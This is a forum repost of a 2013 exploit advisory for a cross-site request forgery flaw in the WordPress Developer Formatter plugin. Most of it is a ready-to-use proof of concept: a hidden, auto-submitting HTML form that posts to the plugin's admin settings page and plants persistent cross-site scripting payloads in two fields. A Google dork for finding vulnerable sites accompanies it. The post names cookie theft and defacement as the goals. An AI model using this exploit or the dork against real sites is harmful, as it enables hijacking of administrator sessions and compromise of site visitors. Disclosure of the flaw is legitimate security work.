Praetorian503 Posted January 23, 2013 Report Posted January 23, 2013 WordPress Developer Formatter plugin suffers from a cross site request forgery vulnerability.====================================================================================================================# Exploit Title: Wordpress Developer Formatter CSRF Vulnerability# Date: 21/01/13# Author: Junaid Hussain -[ illSecure Research Group ] -# Contact: illSecResearchGroup@Gmail.com | Website: illSecure.com# Software Link: http://wordpress.org/extend/plugins/devformatter/# Tested on Wordpress Version 3.5, Should work on all versions.# Google Dork: inurl:devformatter/devformatter.php====================================================================================================================[#] Vulnerable CodePage: devinterface.php - Line: 46 <form method="post" action="options-general.php?page=devformatter/devformatter.php">[#] no nonce given - Read: http://codex.wordpress.org/Function_Reference/wp_nonce_field====================================================================================================================// CSRF Exploit:<html><body onload="javascript:document.forms[0].submit()"><form method="post" action="http://[DOMAIN NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php"><input name="usedevformat" style="display:none;" type="checkbox" checked/> <input name="copyclipboartext" type="text" style="display:none;" value="</textarea><script>alert(/xss/)</script>" /><input name="showtools" style="display:none;" type="checkbox" checked/> <textarea name="devfmtcss" rows="6" cols="60" style="display:none;"> body { background-image: url('javascript:alert("XSS");') !important;}</textarea> </form></html>====================================================================================================================[#] copyclipboartext & devfmtcss are both vulnerable to persistent xss which could lead to cookie stealing, malware distribution or even a defacememnt.[#] Disclaimer: This exploit is for Research/Educational/Academic purposes only, The Author of this exploit takes no responsibility for the way you use this exploit, you are responsible for your own actions. ====================================================================================================================Original: http://illsecure.com/code/Wordpress-DevFormatter-CSRF-Vulnerability.txtSource: PacketStorm Quote